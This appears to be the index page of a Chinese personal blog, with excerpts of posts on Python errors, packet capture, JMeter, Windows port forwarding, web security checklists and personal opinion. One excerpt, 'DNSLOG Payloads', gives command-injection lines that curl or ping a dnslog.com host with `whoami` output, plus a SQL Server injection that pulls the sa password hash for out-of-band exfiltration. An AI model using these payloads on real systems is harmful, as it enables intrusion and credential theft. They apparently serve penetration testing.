NEW

AttributeError: ‘str’ object has no attribute ‘strftime’ 解决方法

AttributeError: ‘str’ object has no attribute ‘strftime’ 解决方法
所以我有一个使用以下进口的脚本:时遇到一个日期字符串转换为unix时间戳 import sys import os.path import requests import json import csv import glob2 import shutil from time import sleep from time import gmtime, strftime import time from datetime import datetime 我想转换row[15]这是一个日期字符串,看起来像"23/03/2015 00:00"(...
2019年08月22日 汪洋大海 暂无评论 喜欢 0 阅读 10 views 次 阅读全文

这样回你微信的人,就别再联系了

这样回你微信的人,就别再联系了
不再联系 一个人是否真的在乎你,不是“听”他说了什么,而是要“看”他怎么说,传统文化告诉我们,辨别一个人是否真的在乎你,要“察其颜,观其色,”往往同一句话,从字面上看来是一个意思,可是由不同的人说出来,不同的神态、口吻往往就会演化出各种不同版本的意思。 现实中人际交往的经验,同样也适用于网络上的交往。在当下,人们通用的微信聊天中,一个人是否值得你继续交...
2019年08月07日 个人日记 暂无评论 喜欢 2 阅读 102 views 次 阅读全文

burp抓包小程序解决方案 – 安卓微信7.0不能抓 https方法

burp抓包小程序解决方案 – 安卓微信7.0不能抓 https方法
前言 最近公司有个小程序要提测,研发提测,体验,发现有个疑似bug的东西,想着抓包看下是不是接口数据的问题,结果问题出现了,按照以前的常规操作,打开fiddler,设置ip代理(https证书已经安装了),结果一看,fiddler居然这样显示: 再看看手机,居然没数据?: 一脸疑问号,一开始以为是自己问题,折腾半天,不对,之前都是没问题的话,同样的环境,同样的设备...
2019年08月02日 汪洋大海 暂无评论 喜欢 0 阅读 220 views 次 阅读全文

libXss.so.1 not found on the system

libXss.so.1 not found on the system
执行安装文件 系统报错 [root@qyi-xsser tmp]# ./acunetix_trial.sh Acunetix Installer Version: v_190515149, Copyright (c) Acunetix ------------------------------------------------------------ Checking os... Checking for dependencies...     - dependency libXi.so.6 not found on the system     - dependency libpangocairo-1...
2019年07月26日 汪洋大海 暂无评论 喜欢 0 阅读 81 views 次 阅读全文

Web安全自查问题清单

Web安全自查问题清单
web自检清单 检查类型 说明 检查项 输入验证 概述 任何来自客户端的数据,如URL和参数、HTTP头部、 Javascript戓其他嵌入代码提交的信息,都属于不可信数据。在应用外部边界或内部每个组件或功能边界,都将其当做潜在的恶意输入来校验 白名单 不可信数据可以设定白名单校验的,应接受所有和白名单匹配的数据,并阻止其他数据 ...
2019年07月22日 汪洋大海 暂无评论 喜欢 0 阅读 243 views 次 阅读全文

中国人应挺胸抬头的做人!!!对外国人不要卑躬屈膝鞍前马后了行么?

中国人应挺胸抬头的做人!!!对外国人不要卑躬屈膝鞍前马后了行么?
抬头挺胸 首先先看几个事件吧,当然了,很多事件你永远不可能“百度”出来,如果有条件的还是想办法看看外面的世界吧。 山东大学陪学事件:https://news.ifeng.com/c/7oEvShx4RvE 南京地铁罚款事件:http://baijiahao.baidu.com/s?id=1639049549132779949&wfr=spider&for=pc 福州民警被外国留学生追着打事件:http://3g.163.com/news/article_cambrian/EJQPKNH80525O2...
2019年07月18日 个人日记 评论 1 条 喜欢 0 阅读 154 views 次 阅读全文

DNSLOG Payloads

DNSLOG Payloads
0x00 Command Execution i. *nix: curl http://ip.port.b182oj.dnslog.com/`whoami` ping `whoami`.ip.port.b182oj.dnslog.com ii. windows ping %USERNAME%.b182oj.dnslog.com 0x01 SQL Injection i. SQL Server DECLARE @host varchar(1024); SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa') +'....
2019年07月17日 汪洋大海 暂无评论 喜欢 0 阅读 68 views 次 阅读全文

Jmeter 自增变量 参数化及自定义变量函数的使用

Jmeter 自增变量 参数化及自定义变量函数的使用
参数化是自动化测试脚本的一种常用技巧。简单来说,参数化的一般用法就是将脚本中的某些输入使用参数来代替,在脚本运行时指定参数的取值范围和规则; 这样,脚本在运行时就可以根据需要选取不同的参数值作为输入。这种方式通常被称为数据驱动测试(Data Driven Test),参数的取值范围被称为数据池(Data Pool)。   jmeter的test plan中,支持如下4种参数化方式: 函...
2019年07月16日 汪洋大海 暂无评论 喜欢 0 阅读 92 views 次 阅读全文

Windows命令自带端口转发命令

Windows命令自带端口转发命令
0x00 前言 在Windows系统中,从XP开始就内嵌了一个设置网络端口转发的功能。依靠这个功能,任何到本地端口的TCP连接(ipv4或者ipv6)都能够被转发到任意一个本地端口,甚至是远程主机的某个端口。并且,Windows系统并不需要去开启监听这个转发端口的服务。 在Linux中,配置端口转发十分容易,使用iptables配置规则即可。但是在Windows服务器中,远程访问控制协议(RRAS)通...
2019年07月10日 汪洋大海 暂无评论 喜欢 0 阅读 81 views 次 阅读全文

一些优秀的甲方安全开源项目收集

一些优秀的甲方安全开源项目收集
这是一份甲方安全开源项目清单,收集了一些比较优秀的安全开源项目,以帮助甲方安全从业人员构建企业安全能力。 这些开源项目,每一个都在致力于解决一些安全问题。 项目收集的思路: 一个是关注互联网企业/团队的安全开源项目,经企业内部实践,这些最佳实践值得借鉴。另一个是来自企业安全能力建设的需求,根据需求分类,如WAF、HIDS、Git监控等。 这个收集是一个长期的过...
2019年07月09日 汪洋大海 暂无评论 喜欢 0 阅读 102 views 次 阅读全文